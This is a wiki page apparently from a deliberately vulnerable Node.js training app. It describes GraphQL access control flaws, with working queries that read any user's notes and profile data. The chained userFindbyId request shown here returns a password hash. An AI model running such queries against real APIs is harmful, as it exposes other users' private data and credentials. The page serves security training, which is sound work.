-
Notifications
You must be signed in to change notification settings - Fork 178
GraphQL Access Control Issues
Sam Sanoop edited this page Dec 15, 2021
·
2 revisions
Access Control issues can exist in Graphql
- The
readNotequery can be used to read any notes from the endpoint
query {
readNote(name:"test"){
id,
name,
body,
created_date,
user,
type,
no
}
}
-
The
updateUserUploadFilemutation can be called by any authenticated user - https://github.com/snoopysecurity/dvws-node/wiki/GraphQL- -
The
userSearchByUsernamequery can be used to access information about any user
Request:
query {
userSearchByUsername(username: "test")
{
id,
username,
password,
admin
}
}
Respose:
{
"data": {
"userSearchByUsername": [
{
"id": "61ba33fda2b09f19c069363e",
"username": "test",
"password": null,
"admin": false
}
]
}
}
This query by default does not provide the password hash. However userFindbyId can be used to get this password hash.
Request:
query {
userFindbyId(id: "61ba33fda2b09f19c069363e")
{
username,
password,
admin
}
}
Response:
{
"data": {
"userFindbyId": {
"username": "test",
"password": "$2b$10$ZdP85I0w91KePs9FoGVr1O9wq1SthzQNSYXGjufAPw6aGN/qvaHuS",
"admin": false
}
}
}
- XML External Entity Injection
- Server Side Request Forgery (SSRF)
- Username Enumeration
- NoSQL Injection
- Insecure Direct Object Reference
- Mass Assignment
- Cross Site Scripting (XSS)
- Hidden API Functionality Exposure
- SQL Injection
- Information Disclosure
- Insecure PostMessage Configuration
- Command Injection
- Prototype Pollution
- JSON Hijacking
- XPath Injection
- Cross Origin Resource-Sharing Misonfiguration
- JWT Secret Key Brute Force
- Vertical Access Control
- Horizontal Access Control
- Open Redirect
- Path Traversal
- Unsafe Deserialization
- Sensitive Data Exposure
- Arbitrary File Write
- Introspection Enabled
- GraphQL Access Control Issues
- GraphQL Batching Brute Force
- Client Side Template Injection